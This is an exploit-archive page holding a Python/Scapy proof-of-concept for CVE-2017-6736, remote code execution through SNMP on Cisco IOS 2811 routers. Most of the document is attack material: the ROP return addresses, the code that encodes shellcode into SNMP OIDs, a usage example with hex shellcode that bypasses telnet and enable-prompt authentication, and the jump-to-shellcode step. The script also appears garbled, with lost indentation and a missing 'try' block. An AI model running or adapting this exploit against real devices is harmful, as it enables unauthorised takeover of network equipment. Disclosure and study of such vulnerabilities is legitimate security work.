Cisco IOS SNMP Remote Code Execution

Cisco IOS SNMP service remote code execution exploit.

MD5 | 5f3951091331dd74f24502404f32ca06

#!/usr/bin/env python

if False: '''
CVE-2017-6736 / cisco-sa-20170629-snmp Cisco IOS remote code execution

This repository contains Proof-Of-Concept code for exploiting remote code execution vulnerability in SNMP service disclosed by Cisco Systems on June 29th 2017 - <>


RCE exploit code is available for Cisco Integrated Service Router 2811. This exploit is firmware dependent. The latest firmware version is supported:

- Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)

ROM Monitor version:

- System Bootstrap, Version 12.4(13r)T, RELEASE SOFTWARE (fc1)

Read-only community string is required to trigger the vulnerability.


The exploit requires shellcode as HEX input. This repo contains an example shellcode for bypassing authentication in telnet service and in enable prompt. Shellcode to revert changes is also available. If you want to write your own shellcode feel free to do so. Just have two things in mind:

- Don't upset the watchdog by running your code for too long. Call a sleep function once in a while.
- Return execution flow back to SNMP service at the end. You can use last opcodes from the demo shellcode:

3c1fbfc4 lui $ra, 0xbfc4
37ff89a8 ori $ra, $ra, 0x89a8
03e00008 jr $ra
00000000 nop

Usage example

$ sudo python public 8fb40250000000003c163e2936d655b026d620000000000002d4a821000000008eb60000000000003c1480003694f000ae96000000000000aea00000000000003c1fbfc437ff89a803e0000800000000
Writing shellcode to 0x8000f000
Sent 1 packets.
0x8000f0a4: 8fb40250 lw $s4, 0x250($sp)
Sent 1 packets.
0x8000f0a8: 00000000 nop
Sent 1 packets.
0x8000f0ac: 3c163e29 lui $s6, 0x3e29
Sent 1 packets.
0x8000f0b0: 36d655b0 ori $s6, $s6, 0x55b0


Firmware verson can be read via snmpget command:

$ snmpget -v 2c -c public

SNMPv2-MIB::sysDescr.0 = STRING: Cisco IOS Software, 2800 Software (C2800NM-ADVENTERPRISEK9-M), Version 15.1(4)M12a, RELEASE SOFTWARE (fc1)
Technical Support:
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Tue 04-Oct-16 03:37 by prod_rel_team


Artem Kondratenko

## Shellcode

## unset_shellcode

from scapy.all import *
from time import sleep
from struct import pack, unpack
import random
import argparse
import sys
from termcolor import colored

cs = __import__('capstone')
except ImportError:

def bin2oid(buf):
return ''.join(['.' + str(unpack('B',x)[0]) for x in buf])

def shift(s, offset):
res = pack('>I', unpack('>I', s)[0] + offset)
return res

alps_oid = '{0}{1}{2}{3}{4}{5}{6}{7}.{8}{9}.{10}{11}.'
shellcode_start = '\x80\x00\xf0\x00'

if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("host", type=str, help="host IP")
parser.add_argument("community", type=str, help="community string")
parser.add_argument("shellcode", action='store', type=str, help='shellcode to run (in hex)')
args = parser.parse_args()

sh_buf = args.shellcode.replace(' ','').decode('hex')
print 'Writing shellcode to 0x{}'.format(shellcode_start.encode('hex'))
if 'capstone' in sys.modules:

for k, sh_dword in enumerate([sh_buf[i:i+4] for i in range(0, len(sh_buf), 4)]):
s0 = bin2oid(sh_dword) # shellcode dword
s1 = bin2oid('\x00\x00\x00\x00')
s2 = bin2oid('\xBF\xC5\xB7\xDC')
s3 = bin2oid('\x00\x00\x00\x00')
s4 = bin2oid('\x00\x00\x00\x00')
s5 = bin2oid('\x00\x00\x00\x00')
s6 = bin2oid('\x00\x00\x00\x00')
ra = bin2oid('\xbf\xc2\x2f\x60') # return control flow jumping over 1 stack frame
s0_2 = bin2oid(shift(shellcode_start, k * 4))
ra_2 = bin2oid('\xbf\xc7\x08\x60')
s0_3 = bin2oid('\x00\x00\x00\x00')
ra_3 = bin2oid('\xBF\xC3\x86\xA0')

payload = alps_oid.format(s0, s1, s2, s3, s4, s5, s6, ra, s0_2, ra_2, s0_3, ra_3)


cur_addr = unpack(">I",shift(shellcode_start, k * 4 + 0xa4))[0]
if 'capstone' in sys.modules:
for i in md.disasm(sh_dword, cur_addr):
color = 'green'
print("0x%x:\t%s\t%s\t%s" %(i.address, sh_dword.encode('hex'), colored(i.mnemonic, color), colored(i.op_str, color)))
print("0x%x:\t%s" %(cur_addr, sh_dword.encode('hex')))


ans = raw_input("Jump to shellcode? [yes]: ")

if ans == 'yes':
ra = bin2oid(shift(shellcode_start, 0xa4)) # return control flow jumping over 1 stack frame
zero = bin2oid('\x00\x00\x00\x00')
payload = alps_oid.format(zero, zero, zero, zero, zero, zero, zero, ra, zero, zero, zero, zero)
print 'Jump taken!'

Related Posts